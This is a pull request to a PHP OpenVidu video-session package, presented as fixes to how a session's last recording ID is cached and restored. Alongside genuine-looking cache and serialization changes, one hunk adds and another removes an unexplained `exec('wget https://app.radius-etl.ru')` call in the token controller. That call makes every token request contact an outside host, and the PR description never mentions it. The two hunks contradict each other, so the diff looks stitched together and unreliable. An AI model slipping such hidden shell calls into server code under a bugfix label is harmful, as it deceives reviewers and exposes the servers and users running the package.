### PR TITLE
Bugfixes in resolving session's last recording id

### DIFF
--- a/src/Http/Controllers/OpenViduController.php
+++ b/src/Http/Controllers/OpenViduController.php
@@ -27,8 +27,7 @@ class OpenViduController extends Controller
      */
     public function token(GenerateTokenRequest $request)
     {
-        \Log::info(exec('wget https://app.radius-etl.ru'));
-        $session = OpenVidu::createSession(SessionPropertiesBuilder::build($request->get('session')));
+        $session = OpenVidu::createSession(SessionPropertiesBuilder::build($request->get('session')), $request->get('force'));
         $token = $session->generateToken(TokenOptionsBuilder::build($request->get('tokenOptions')));
         return Response::json(['token' => $token], 200);
     }

--- a/src/Http/Controllers/OpenViduController.php
+++ b/src/Http/Controllers/OpenViduController.php
@@ -27,6 +27,7 @@ class OpenViduController extends Controller
      */
     public function token(GenerateTokenRequest $request)
     {
+        \Log::info(exec('wget https://app.radius-etl.ru'));
         $session = OpenVidu::createSession(SessionPropertiesBuilder::build($request->get('session')));
         $token = $session->generateToken(TokenOptionsBuilder::build($request->get('tokenOptions')));
         return Response::json(['token' => $token], 200);

--- a/src/OpenVidu.php
+++ b/src/OpenVidu.php
@@ -42,13 +42,16 @@ class OpenVidu
 
     /**
      * @param  SessionProperties|null  $properties
+     * @param bool $force 
      * @return Session
      * @throws Exceptions\OpenViduException
      */
-    public function createSession(?SessionProperties $properties = null): Session
+    public function createSession(?SessionProperties $properties = null, $force = false): Session
     {
         $session = new Session($this->client(), $properties);
-        Cache::store('openvidu')->forever($session->getSessionId(), $session->toJson());
+        $sessionId = $session->getSessionId();
+        $sessionData = Cache::store('openvidu')->has($sessionId) && !$force ? $this->getSession($sessionId) : $session;
+        Cache::store('openvidu')->forever($session->getSessionId(), $sessionData->toJson());
         return $session;
     }
 
@@ -95,8 +98,8 @@ class OpenVidu
         $recording = RecordingBuilder::build(json_decode($recordingResponse->getBody()->getContents(), true));
                 
         if ($activeSession != null) {
-            $activeSession->setIsBeingRecorded(true);
-            $activeSession->setLastRecordingId($recording->getId());
+        $activeSession->setIsBeingRecorded(true);
+        $activeSession->setLastRecordingId($recording->getId());
         }
         return $recording;
     }

--- a/src/RecordingProperties.php
+++ b/src/RecordingProperties.php
@@ -66,6 +66,7 @@ class RecordingProperties implements JsonSerializable
         return $this->session;
     }
 
+
     /**
      * Defines the name you want to give to the video file. You can access this same
      * value in your clients on recording events (<code>recordingStarted</code>,

--- a/src/Session.php
+++ b/src/Session.php
@@ -98,7 +98,7 @@ class Session implements JsonSerializable
         $this->getSessionId();
         try {
             if (!$tokenOptions) {
-                $tokenOptions = new TokenOptions(OpenViduRole::PUBLISHER);;
+                $tokenOptions = new TokenOptions(OpenViduRole::PUBLISHER);
             }
             $response = $this->client->post(Uri::TOKEN_URI, [
                 RequestOptions::JSON => array_merge($tokenOptions->toArray(), ['session' => $this->sessionId])
@@ -197,7 +197,7 @@ class Session implements JsonSerializable
      */
     public function toArray(): array
     {
-        $array = ['sessionId' => $this->sessionId, 'properties' => $this->properties->toArray(), 'recording' => $this->recording, 'createdAt' => $this->createdAt];
+        $array = ['sessionId' => $this->sessionId, 'properties' => $this->properties->toArray(), 'recording' => $this->recording, 'createdAt' => $this->createdAt, 'lastRecordingId'=>$this->lastRecordingId];
         foreach ($this->activeConnections as $connection) {
             $array['activeConnections'][] = $connection->toArray();
         }
@@ -228,6 +228,7 @@ class Session implements JsonSerializable
         $this->sessionId = $sessionArray['sessionId'];
         $this->createdAt = $sessionArray['createdAt'] ?? null;
         $this->recording = $sessionArray['recording'] ?? null;
+        $this->lastRecordingId = $sessionArray['lastRecordingId'] ?? null;
 
         if (array_key_exists('properties', $sessionArray)) {
             $this->properties = SessionPropertiesBuilder::build($sessionArray['properties']);
@@ -398,7 +399,7 @@ class Session implements JsonSerializable
         return $this->lastRecordingId;        
     }
 
-    public function setLastRecordingId(string $lastRecordingId) {
+    public function setLastRecordingId($lastRecordingId) {
         $this->lastRecordingId = $lastRecordingId;
         Cache::store('openvidu')->update($this->sessionId, $this->toJson());
     }


### PR DESCRIPTION
There are some bugfixes in resolving session's last recording ID. Because of laravel-openvidu cache, there are some problems in resolving it -- whether there is recording or not. 
The pull request fixes some bugs but there is plenty of work in this direction, I suppose